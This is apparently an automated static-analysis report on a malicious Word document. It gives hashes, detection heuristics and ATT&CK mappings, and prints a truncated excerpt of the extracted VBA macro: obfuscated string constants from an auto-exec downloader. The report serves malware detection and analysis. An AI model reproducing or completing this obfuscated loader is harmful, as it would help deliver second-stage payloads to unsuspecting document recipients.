Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f3ff0c98af2ef732…

MALICIOUS

Office (OLE)

110.5 KB Created: 2016-03-14 15:38:00 Authoring application: Microsoft Office Word First seen: 2020-09-04
MD5: 097596ad6748ff948b86be0f8453bdc9 SHA-1: 514bb7b6298dcb113a057d5b9152277995afd996 SHA-256: f3ff0c98af2ef7325fa866a6b8ffc0cb0e4a9a2506ea7b8cd5c75be7ba336bb7
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains a malicious VBA macro, specifically an obfuscated auto-exec loader that utilizes CreateObject and CallByName functions. This macro is designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Amphitryon-10013741-0'. The presence of auto-execution macros like Document_Open and Workbook_Open further supports this malicious intent.

Heuristics 10

  • ClamAV: Doc.Downloader.Amphitryon-10013741-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Amphitryon-10013741-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7689 bytes
SHA-256: f56610814d72a41c9be07029d8ffdee8b41686f4f93d82ba88cf1e56f0dc8e77
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const KCRnrJ As String = ")qr)gnr(e,p( *f(n)j *gar(z)h,pb(,q f*vu)G"
Private Const yUvmTueYILGodWDsc As String = "e(ag,TyB*)SQrL,F(Oxs*b*m,iEXKPv(t,lw*I)H(nJU*q(Wjck,C(R(Zh)dYG*"
Private Const tiWvLefwgU As String = "hx)(pOF)ZtWvIG*VT,c(y,Q*qNMsA*Bum)K"
Private Const OKofaruUQVSC As String = "q)s*Qr()IRcX()T(yg)G(x*l"
Private Const EvnDwTkYsVgCOrmQXcG As String = "n,uY()JxE)TIfNbBjd*Zz(w,,Up*He*ArvP,q*,sl(F,W,S)i*CD(th)KLRyM,G)"
Private Const KOteyJZVWYCrIBU As String = "*Ocp,,n*ld)LaS)F(xe)k,*uJPiB*ZIX)*QEv)(z*Kgy("
Private Const CQmetzGKDqyLbEaIrH As String = "q(XDmign)hb,T(t,vFEc*LM)dZw(eOlYf*A(rW)U,S*Cs(K*R,a,pk*VN"
Private Const EPymQuhLUGTgfsDVXYO As String = "r)yv(s(bg(rinf"
Private Const jAYwUXWRznS As String = "qryon)a,r ro )g,fh,z ,fbepnZ("
Private Const XyVIFgfsGtehqSbn As String = "(wJKE*)Ty)c(*PsHqFC*rW**DY(Ie(Bm)N,Vf)dA*U(p,b"
Private Const QHhgUWTavVejrcm As String = "er*u*HpDT*wzEhgKBfFI**xs*vGi,kM"
Private Const fmEXDt As String = ")qa)rF,"
Private Const zBLQYAuGfkMXRSKwph As String = "C,ZR)G"
Private Const qlNFOdTomVHIt As String = "Q(q,yM(NgfRA,,x)aw)k(o(t,Xd*r)cupbThH*nD(jC*W,vYJ(l)B(sKeFVGI*SZ)z"
Private Const FqgDCx As String = "r)kr).r,u/(ftn(y*s/,,rt(nz*v/e)v(.vqnwz(n(ler,*yy)(nt//(:cgg,)u"
Private Const UkSiDxpABYoureRfzJE As String = "a)r)cB("
Private Const QMEFYnPRlteGhqb As String = ",E*vm)L,gTt*O()ksQoy"
Private Const YNFXgaWTAhxH As String = "0*(.6*.C((GG)UY(Z*Ke(rie,rF).2(yzkfZ"
Private Const kyVXsRPrKYWuo As String = "HnB*Oeo*ME(Pm)Wdg*f)GV*XrT(SU"
Private Const jDIfPlLYGRnUgdH As String = "WnF(OYh)g(BbEw,"
Private Const zeuYgqFEZ As String = ")yy)r)u(F.*g(cvep(F*J"
Private Const oTbSCOlGMxvAcsfkHK As String = "O,r,UZgqNCh)J*)FR,X"
Private Const NnPeajAtpZDhv As String = "VF*(DJu(v,Kax,fXq(R,*P*bzAZ((s(T(GCp,n*L()W,mY)itSNI)QByl*r"
Private Const yWeQUxkDPpO As String = "gih(aK)nq)PAOwQ,S,G)Mo)f,cC)(R)ms**uYXdVyxT"
Private Const urNDXze As String = "l,q*b(Or)*fa,bc)fre"
Private Const syDeEZlqIMxfNpJQ As String = "zX)AJ)(Uq(wL)Md(sWtpK(g,xrOYPn)FyDV)C(Buh,,TR(H)Nkb*v"
Private Const RXtYSWjdmUiyCQGNV As String = "pX(t,EK*OeqI*,Ji(Y,bHys*oPC)rB*T,SZch,dL*vVNzGg(kjM(af,F*RnQ)lDm(x"
Private Const shYCDifWtGBO As String = "C,(Kk(hTuH*ft(a*GnL*UVlIqPdSZRD*zBv*FJ(sr(MN"
Private Const ysBokm As String = "zn)r*eg,F.(o)q*bq,N"
Private Const nzRuZDwHMtlUKVO As String = "B,(EjsQH*z)quhf(b"
Private Const kncwxltzCRfUViGmXHWo As String = "eTp)sEoB,Igq*)f*GXmy,L*"
Private Const psNfYELOoUPwaDQxj As String = "Te*E)Dx(Jc(GzKaMV,NusP)O,HS(iYd(QBr*n)"
Private Const vYhlzHpTRys As String = "j(YFV)gE)JuA*e)bO*Nd)XK(m)i,DMR(n,v,Tfa)*xS(sh"
Private Const aUpFYueQBPEvXwzMK As String = "rg)v(ej*"
Private Const tgasvlhqmXNRof As String = "O)f(eq)G(wv(,HDr*go)j*dah*AuSc(R,tB)lQsK*zmT(ELPUi(pk,"
Private Const pJjABKHeNiu As String = ")VBW)CS,T)pKHNZxz*gQO)j*f*D"
Private Const PuLpwOlzJiHEsACtoRrx As String = "rkr.)57761299)81,7*1055.(0("
Private Const OfYazEBVTrZhqIRwucG As String = "YmVxF,rfns,k)b(Zu,XP(h,MR)NTyW*LKj)EC,G,eAU(QB)H"
Private Const awylvUCzSsbNYK As String = "Q)d)Ht(K,z)qOXw(*GYF("
Private Const oGtYDMZPOHfmsEJNejCw As String = "F,S*GL,)tExB(l,*rekf,Y*d"
Private Const sexhHvnwTCqY As String = "O**la,n(VMe(xvB,ES,oY,XI(PN*(p)j*mu(W)HT)D*"
Private Const UoxWjubwPc As String = "u(X()bECYUl)p,*PNZ*)a,IzV(D,,gy*Qo,sWGxvje"
Private Const uSHlpzVUhO As String = "bXUf*ntmY,C*l,*ku(*r)pL(*O)oTJV,W)FQAqwZeyHzj,N))adG,Sxi(s*E*IvhRK,D"
Private Const VmKjwUQscYpidyf As String = "o(c,gwbHN*vDqXGA*)BK(F,VSjyC,Ur)ze)(xi,(ZIsh,n*,OpmLl,T)P"
Private Const UPzLifXMVNphCeODAumo As String = ",s,bC,,GekyJ)Y(X*pldRVD,"
Private Const VpedlioYAWhKN As String = ",ar(c*B"
Private Const CXmOHcKdjqpIQatPT As String = "jt(CZF)iH*a(gK*IM*BSRJAUw*XL((WpP,yo*,l"
Private Const tXHKPTBpSvoLIDisd As String
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.